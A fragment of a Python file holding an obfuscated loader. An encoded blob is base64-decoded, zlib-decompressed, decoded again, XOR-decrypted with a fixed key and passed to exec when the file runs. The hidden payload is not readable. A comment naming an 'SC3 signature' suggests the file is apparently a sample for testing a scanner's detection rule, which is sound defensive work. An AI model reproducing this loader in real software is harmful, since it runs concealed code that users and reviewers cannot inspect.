ueJ/7V2xUfLlKaV33b2fBoNyPDuau8EPdOlHGZWD60Io9ivPo32VhrgvlrQMIVz3YsGvVCStPxf99TNjj2n1dND3/8+Ano8ztg"
_K = bytes.fromhex("03a40d299dff811e80fefd29")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
